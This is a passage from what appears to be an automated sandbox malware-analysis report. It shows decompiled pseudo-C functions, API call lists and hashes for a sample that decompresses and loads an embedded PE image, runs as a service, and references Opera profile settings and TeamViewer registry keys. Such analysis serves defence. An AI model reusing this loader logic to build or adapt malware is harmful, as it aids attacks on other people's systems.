                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocCreateFreeInstance
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 391255401-0
                                                                                                                        • Opcode ID: 27776237add88c83c724e507bfb15f5ddc85e7989fd377564a46f10d46d49d68
                                                                                                                        • Instruction ID: 359980d816cf8c03f42de83bd4fb8e16698a513408babbae4aae24d11eee666f
                                                                                                                        • Opcode Fuzzy Hash: 27776237add88c83c724e507bfb15f5ddc85e7989fd377564a46f10d46d49d68
                                                                                                                        • Instruction Fuzzy Hash: BA61C0B6604396AFD700DF99C880A5AB7E9BFC9304F104A5DF5998B250D732EC46CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332260(CHAR* _a4, long* _a8) {
                                                                                                                        				long _v4;
                                                                                                                        				long _v8;
                                                                                                                        				void* _t21;
                                                                                                                        				long _t27;
                                                                                                                        				intOrPtr* _t30;
                                                                                                                        				void* _t33;
                                                                                                                        
                                                                                                                        				_t21 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                                                        				if(_t21 == 0xffffffff) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t27 = GetFileSize(_t21, 0);
                                                                                                                        					if(_t27 == 0) {
                                                                                                                        						return 0;
                                                                                                                        					} else {
                                                                                                                        						_t33 = VirtualAlloc(0, _t27, 0x1000, 4);
                                                                                                                        						if(_t33 == 0) {
                                                                                                                        							L6:
                                                                                                                        							return 0;
                                                                                                                        						} else {
                                                                                                                        							_v4 = 0;
                                                                                                                        							ReadFile(_t21, _t33, _t27,  &_v4, 0);
                                                                                                                        							CloseHandle(_t21);
                                                                                                                        							_v8 = 0;
                                                                                                                        							_t30 = E6F332190(_t33, _t27,  &_v8);
                                                                                                                        							VirtualFree(_t33, 0, 0x8000);
                                                                                                                        							if(_t30 == 0 ||  *_t30 != 0x5a4d) {
                                                                                                                        								goto L6;
                                                                                                                        							} else {
                                                                                                                        								 *_a8 = _v8;
                                                                                                                        								return _t30;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}










                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 6F33227C
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 6F332290
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 6F3322A9
                                                                                                                        • ReadFile.KERNEL32 ref: 6F3322C7
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3322CE
                                                                                                                          • Part of subcall function 6F332190: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F3321BA
                                                                                                                          • Part of subcall function 6F332190: RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6F3321D1
                                                                                                                          • Part of subcall function 6F332190: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3321E5
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3322F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$File$AllocFree$BufferCloseCreateDecompressHandleReadSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3075244933-0
                                                                                                                        • Opcode ID: ed6703f9a434242c1575f5fd6bebbe72632ada6202ba3f579932b8e4c94ddcb3
                                                                                                                        • Instruction ID: 9da5b79b79cb42aab962a2fd186ff172f70713cce5bba903bec4399c73d9ee20
                                                                                                                        • Opcode Fuzzy Hash: ed6703f9a434242c1575f5fd6bebbe72632ada6202ba3f579932b8e4c94ddcb3
                                                                                                                        • Instruction Fuzzy Hash: DE212B3770076067D6209A65AC49F8B7BADEBC5B32F10051AF904D7280E675E41987F1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332190(void* _a4, long _a8, intOrPtr* _a12) {
                                                                                                                        				long _v4;
                                                                                                                        				long _v8;
                                                                                                                        				intOrPtr* _v22;
                                                                                                                        				long _v30;
                                                                                                                        				intOrPtr _v42;
                                                                                                                        				intOrPtr _t18;
                                                                                                                        				long _t34;
                                                                                                                        				void* _t35;
                                                                                                                        				void* _t36;
                                                                                                                        				void* _t37;
                                                                                                                        
                                                                                                                        				_t37 = _a4;
                                                                                                                        				_t34 = _a8;
                                                                                                                        				_v8 = 0;
                                                                                                                        				_v4 = 0;
                                                                                                                        				do {
                                                                                                                        					_t36 = VirtualAlloc(0, _t34, 0x1000, 4);
                                                                                                                        					if(_t36 == 0) {
                                                                                                                        						goto L4;
                                                                                                                        					} else {
                                                                                                                        						if(RtlDecompressBuffer(2, _t36, _t34, _t37, _a8,  &_v8) != 0xc0000242) {
                                                                                                                        							_t35 = VirtualAlloc(0, _v30, 0x1000, 4);
                                                                                                                        							if(_t35 == 0) {
                                                                                                                        								break;
                                                                                                                        							} else {
                                                                                                                        								RtlMoveMemory(_t35, _t36, _v30);
                                                                                                                        								VirtualFree(_t36, 0, 0x8000);
                                                                                                                        								 *_v22 = _v42;
                                                                                                                        								return _t35;
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							VirtualFree(_t36, 0, 0x8000);
                                                                                                                        							_t34 = _t34 + _t34;
                                                                                                                        							goto L4;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L8:
                                                                                                                        					L4:
                                                                                                                        					_t18 = _v4 + 1;
                                                                                                                        					_v4 = _t18;
                                                                                                                        				} while (_t18 < 0x1e);
                                                                                                                        				 *_a12 = _v8;
                                                                                                                        				return 0;
                                                                                                                        				goto L8;
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F3321BA
                                                                                                                        • RtlDecompressBuffer.NTDLL(00000002,00000000,?,?,?,?), ref: 6F3321D1
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F3321E5
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 6F33221D
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6F33222C
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?), ref: 6F332239
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$AllocFree$BufferDecompressMemoryMove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 201667072-0
                                                                                                                        • Opcode ID: f628c9c3d51b27a6f5a14c2dbf19b380472e5a08b4a194fd9b50bc0a2a10a746
                                                                                                                        • Instruction ID: 1ffc6b527c721d7b521e819dfbfee453cf54da3b88b65d014aa4ecc915c3e9fa
                                                                                                                        • Opcode Fuzzy Hash: f628c9c3d51b27a6f5a14c2dbf19b380472e5a08b4a194fd9b50bc0a2a10a746
                                                                                                                        • Instruction Fuzzy Hash: F721AE726443516BD310CE199D41F6BB3E8FBC9B21F10091DF684E7280DB60E8098AA6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00503AD3
                                                                                                                        • _malloc.LIBCMT ref: 00503AFA
                                                                                                                          • Part of subcall function 00537172: __FF_MSGBANNER.LIBCMT ref: 00537195
                                                                                                                          • Part of subcall function 00537172: RtlAllocateHeap.NTDLL(00000000,005343C7,00000000,00000002,00000000,?,005343D6,?), ref: 005371EA
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004A1C93: __EH_prolog3.LIBCMT ref: 004A1C9A
                                                                                                                          • Part of subcall function 004A1C93: EnterCriticalSection.KERNEL32(00000001,00000004,004A3359,00000008,004BDB63,00747890,00000000,?,?,?,?,?,?,00000001,00747890,00000004), ref: 004A1CA8
                                                                                                                          • Part of subcall function 004A1C93: LeaveCriticalSection.KERNEL32(00000001,?,?,?,?,?,?,00000001,00747890,00000004,?,?,?,?,00000000,00000001), ref: 004A1CC9
                                                                                                                          • Part of subcall function 0050390E: __EH_prolog3.LIBCMT ref: 00503915
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00503C2C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$H_prolog3$EnterInitializeLeave$AllocateDeleteException@8H_prolog3_catchHeapThrow_malloc
                                                                                                                        • String ID: HTTP server=$\Opera\Opera\profile\opera6.ini
                                                                                                                        • API String ID: 923398483-1944140675
                                                                                                                        • Opcode ID: 387a58e34ae01eb2f4bdd73280e0e3018b7f31f02a5672f5b804225d7edcb71c
                                                                                                                        • Instruction ID: f7efd1ae7d344062b201b71234a66cc9379c0d9aa8ce31e5eb433115c93659b8
                                                                                                                        • Opcode Fuzzy Hash: 387a58e34ae01eb2f4bdd73280e0e3018b7f31f02a5672f5b804225d7edcb71c
                                                                                                                        • Instruction Fuzzy Hash: 1281C13080418CDADF15EBA4C952BDD7B74AF22308F14419EF806A71E2DB74AF49CB56
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_String_base::_Xlen.LIBCPMT ref: 0040694E
                                                                                                                        • char_traits.LIBCPMT ref: 004069A2
                                                                                                                        • char_traits.LIBCPMT ref: 00406A0C
                                                                                                                        • char_traits.LIBCPMT ref: 00406A2F
                                                                                                                          • Part of subcall function 005158D5: _wmemcpy_s.LIBCPMT ref: 005158E4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: char_traits$String_base::_Xlen_wmemcpy_sstd::_
                                                                                                                        • String ID: rd@
                                                                                                                        • API String ID: 2185617273-3749284383
                                                                                                                        • Opcode ID: bca752cff46ffc78040003baf4c8dedcbccb0fab70649c740d03560e7920520f
                                                                                                                        • Instruction ID: f5eb2875d0644d7eb7b7846163d203073de6211e0b612176977c0587568a3520
                                                                                                                        • Opcode Fuzzy Hash: bca752cff46ffc78040003baf4c8dedcbccb0fab70649c740d03560e7920520f
                                                                                                                        • Instruction Fuzzy Hash: 7151B5B1200109DFCF14DF68CA848AE77B6FF81354711852EF817AB685DB34E964CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BD55D
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000050), ref: 004BD595
                                                                                                                        • _wcsrchr.LIBCMT ref: 004BD5A1
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 004BD646
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalH_prolog3Section$Initialize$CreateDirectoryEnterFileLeaveModuleName_wcsrchr
                                                                                                                        • String ID: \TeamViewer
                                                                                                                        • API String ID: 2480491743-4231698710
                                                                                                                        • Opcode ID: a191dd3ec02a7590f31f131ea8e4a6ca8194ebdacd7b562491a6b748903fa322
                                                                                                                        • Instruction ID: 04c1fa282bc66df1466338df8a5312919105ea49e46d02473211885c2902fa9f
                                                                                                                        • Opcode Fuzzy Hash: a191dd3ec02a7590f31f131ea8e4a6ca8194ebdacd7b562491a6b748903fa322
                                                                                                                        • Instruction Fuzzy Hash: E43106B1904248ABDB10EFA4DC55AEEBBB8FF65304F10406FF00697292EB385B05C768
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 005037F6
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\TeamViewer3,00000000,00000001,?,00000000,00000054,0050422B,?,TV3REG,00000000,?,00749778,00000000,00000090), ref: 00503823
                                                                                                                          • Part of subcall function 004D8E8D: __EH_prolog3.LIBCMT ref: 004D8E94
                                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000,000000FF,?,?,Proxy_IP), ref: 0050388E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseH_prolog3H_prolog3_Openchar_traits
                                                                                                                        • String ID: Proxy_IP$SOFTWARE\TeamViewer3
                                                                                                                        • API String ID: 1636729521-564699907
                                                                                                                        • Opcode ID: 8b8b3f45950f3b9b4ba12f8d660e7988052ba13638ac5e666e0360042114d55a
                                                                                                                        • Instruction ID: bcc368aa53542c86c2cb5e05f7fa938efaf3251d6d3b89b37230df6600facaff
                                                                                                                        • Opcode Fuzzy Hash: 8b8b3f45950f3b9b4ba12f8d660e7988052ba13638ac5e666e0360042114d55a
                                                                                                                        • Instruction Fuzzy Hash: A631A370905148AADF15EBE9C856AEDBF39AF24308F14806EF111771D1DA785F08C765
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • FindMITargetTypeInstance.LIBCMT ref: 0053406A
                                                                                                                          • Part of subcall function 00533DBE: PMDtoOffset.LIBCMT ref: 00533E4C
                                                                                                                        • FindVITargetTypeInstance.LIBCMT ref: 00534071
                                                                                                                        • PMDtoOffset.LIBCMT ref: 00534081
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 005340B5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: FindInstanceOffsetTargetType$Exception@8Throw
                                                                                                                        • String ID: Bad dynamic_cast!
                                                                                                                        • API String ID: 1201063319-2956939130
                                                                                                                        • Opcode ID: 92d32a1ffb4fa5d716ff78c610ca4a167ebf75a860a1ece68e4e1ed39334a69c
                                                                                                                        • Instruction ID: 02c747076542a1df120f515d282fc8964f5114e4f5ffc62588cd54f2b7eae7be
                                                                                                                        • Opcode Fuzzy Hash: 92d32a1ffb4fa5d716ff78c610ca4a167ebf75a860a1ece68e4e1ed39334a69c
                                                                                                                        • Instruction Fuzzy Hash: DC11A276B002059FCB14EE74D90AAAE7FB4BF84751F144444E501EB292EB34EA019F90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 60%
                                                                                                                        			E6F334FE0(intOrPtr _a4) {
                                                                                                                        				char* _v0;
                                                                                                                        				char _v264;
                                                                                                                        				char _v272;
                                                                                                                        				char* _t9;
                                                                                                                        				int _t10;
                                                                                                                        				void* _t11;
                                                                                                                        				intOrPtr _t15;
                                                                                                                        				void* _t21;
                                                                                                                        				void* _t22;
                                                                                                                        
                                                                                                                        				_t21 =  &_v264;
                                                                                                                        				_push(0x105);
                                                                                                                        				_push( &_v264);
                                                                                                                        				L6F33C2EE();
                                                                                                                        				_t9 = _v0;
                                                                                                                        				if(_t9 == 0) {
                                                                                                                        					_t9 = M6F340530; // 0xa32c28
                                                                                                                        				}
                                                                                                                        				_t10 = wsprintfA( &_v272, "\"%s\"", _t9);
                                                                                                                        				_t15 = _a4;
                                                                                                                        				_t22 = _t21 + 0xc;
                                                                                                                        				if(_t15 > 0) {
                                                                                                                        					wsprintfA(_t22 + _t10 + 8, " w %d", _t15);
                                                                                                                        					_t22 = _t22 + 0xc;
                                                                                                                        				}
                                                                                                                        				_t11 = M6F3404D4; // 0xa45f28
                                                                                                                        				_push(_t11);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				_push(0);
                                                                                                                        				return E6F334EF0( &_v264, 1, 0);
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$MemoryZero
                                                                                                                        • String ID: w %d$"%s"
                                                                                                                        • API String ID: 3693688802-504233264
                                                                                                                        • Opcode ID: cc1f0dedeb594d3dc9045783fbe87b615ddf5d5930b522b8c07a856487b524b8
                                                                                                                        • Instruction ID: d7e8c9fe9642e7e2dd183943a42b91e8614807a1d19678c65d97b6b3a4a52554
                                                                                                                        • Opcode Fuzzy Hash: cc1f0dedeb594d3dc9045783fbe87b615ddf5d5930b522b8c07a856487b524b8
                                                                                                                        • Instruction Fuzzy Hash: 18F0C273A0435467DB24EB68DC42FD773ACAB94704F00041DB684DB2C1EAB2A558CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2887
                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000004,004C5A03,?,00000002,?,00000000,0000042C), ref: 004A2895
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000002,?,00000000,0000042C), ref: 004A28B0
                                                                                                                        • _strtol.LIBCMT ref: 004A28F9
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A290F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$EnterH_prolog3_strtol
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2502800903-0
                                                                                                                        • Opcode ID: f7f6c4bfb273c7a2f3ca1b5349d5f9134ce44b387ca9d11afbfbe40468a58ae5
                                                                                                                        • Instruction ID: dbbd4bc630c5cef6c32fefb03738c3f9b631d074113d92f91c4ff0c48401bed5
                                                                                                                        • Opcode Fuzzy Hash: f7f6c4bfb273c7a2f3ca1b5349d5f9134ce44b387ca9d11afbfbe40468a58ae5
                                                                                                                        • Instruction Fuzzy Hash: 0B11EC31E0420697E7316B2C8E0572EB764BBA2721F15071EF472A62D0CBBC5D417609
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2925
                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000004,004A2A9D,000000FF,?,00000001,3B9ACA00,00781FF0,00000001,00000024,004BDFB1,00000000,00000000, Except: ,00000000,0077C1F8), ref: 004A2933
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A294E
                                                                                                                        • _strtol.LIBCMT ref: 004A2999
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A29AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$EnterH_prolog3_strtol
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2502800903-0
                                                                                                                        • Opcode ID: 37c9610866bf00587f247864d3f2b76478b1e00bfd13e4ea9a01ff77ac72e08c
                                                                                                                        • Instruction ID: 9493fe94d5cb17c39f28cebf53e62ab83799b8b87c0f5c052e7058186503f85b
                                                                                                                        • Opcode Fuzzy Hash: 37c9610866bf00587f247864d3f2b76478b1e00bfd13e4ea9a01ff77ac72e08c
                                                                                                                        • Instruction Fuzzy Hash: A1112CB1F00202D7EB315F1CCE0576FB7A8BBA6B21F10451AE455A7390CBB85E41A709
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33C13A() {
                                                                                                                        				struct _FILETIME _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				union _LARGE_INTEGER _v20;
                                                                                                                        				signed int _t14;
                                                                                                                        				signed int _t16;
                                                                                                                        				signed int _t17;
                                                                                                                        				signed int _t18;
                                                                                                                        				signed int _t22;
                                                                                                                        				signed int _t23;
                                                                                                                        				signed int _t32;
                                                                                                                        
                                                                                                                        				_t14 =  *0x6f340264; // 0x3f5f602c
                                                                                                                        				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                                                                                                        				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
                                                                                                                        				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
                                                                                                                        					GetSystemTimeAsFileTime( &_v12);
                                                                                                                        					_t16 = GetCurrentProcessId();
                                                                                                                        					_t17 = GetCurrentThreadId();
                                                                                                                        					_t18 = GetTickCount();
                                                                                                                        					QueryPerformanceCounter( &_v20);
                                                                                                                        					_t22 = _v16 ^ _v20.LowPart;
                                                                                                                        					_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
                                                                                                                        					if(_t32 == 0xbb40e64e || ( *0x6f340264 & 0xffff0000) == 0) {
                                                                                                                        						_t32 = 0xbb40e64f;
                                                                                                                        					}
                                                                                                                        					 *0x6f340264 = _t32;
                                                                                                                        					 *0x6f340268 =  !_t32;
                                                                                                                        					return _t22;
                                                                                                                        				} else {
                                                                                                                        					_t23 =  !_t14;
                                                                                                                        					 *0x6f340268 = _t23;
                                                                                                                        					return _t23;
                                                                                                                        				}
                                                                                                                        			}














                                                                                                                        APIs
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6F33C171
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 6F33C17D
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33C185
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33C18D
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6F33C199
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1445889803-0
                                                                                                                        • Opcode ID: eef9a7c3295c226a5235201894336f2e9d192f466f08500627768503cdccbb11
                                                                                                                        • Instruction ID: d6c5491c1d20ec5ae5364ca9b800365bae88bd44d49d82afefd14c1119ee2fc5
                                                                                                                        • Opcode Fuzzy Hash: eef9a7c3295c226a5235201894336f2e9d192f466f08500627768503cdccbb11
                                                                                                                        • Instruction Fuzzy Hash: 810188B3D00A759BDF10EBB4C54859EB7FDEB4A361F51091AE811E7154DB709924CB80
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F333A70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                        				void* _t9;
                                                                                                                        
                                                                                                                        				_t9 = _a4 - 1;
                                                                                                                        				if(_t9 > 0xd) {
                                                                                                                        					L10:
                                                                                                                        					SetServiceStatus( *0x6f340394, 0x6f34043c);
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				switch( *((intOrPtr*)(( *(_t9 + 0x6f333b48) & 0x000000ff) * 4 +  &M6F333B34))) {
                                                                                                                        					case 0:
                                                                                                                        						 *0x6f340440 = 1;
                                                                                                                        						 *0x6f340448 = 0;
                                                                                                                        						 *0x6f340450 = 0;
                                                                                                                        						 *0x6f340454 = 0;
                                                                                                                        						goto L10;
                                                                                                                        					case 1:
                                                                                                                        						 *0x6f340440 = 7;
                                                                                                                        						goto L10;
                                                                                                                        					case 2:
                                                                                                                        						 *0x6f340440 = 4;
                                                                                                                        						goto L10;
                                                                                                                        					case 3:
                                                                                                                        						if(_a8 == 5) {
                                                                                                                        							_t13 = _a12;
                                                                                                                        							_t20 = _t19 | 0xffffffff;
                                                                                                                        							if(_t13 != 0) {
                                                                                                                        								_t20 =  *(_t13 + 4);
                                                                                                                        							}
                                                                                                                        							_t15 = HeapAlloc(GetProcessHeap(), 8, 4);
                                                                                                                        							if(_t15 != 0) {
                                                                                                                        								 *_t15 = _t20;
                                                                                                                        								CloseHandle(CreateThread(0, 0, E6F333930, _t15, 0, 0));
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L10;
                                                                                                                        					case 4:
                                                                                                                        						goto L10;
                                                                                                                        				}
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004), ref: 6F333AAA
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333AB1
                                                                                                                        • CreateThread.KERNEL32 ref: 6F333ACB
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F333AD2
                                                                                                                        • SetServiceStatus.ADVAPI32(00000000,6F34043C), ref: 6F333B26
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocCloseCreateHandleProcessServiceStatusThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3654718518-0
                                                                                                                        • Opcode ID: aa1efb9f6c07cb329115d044f5e6efb0496722ea239d2bec41fa2f3847d00fd6
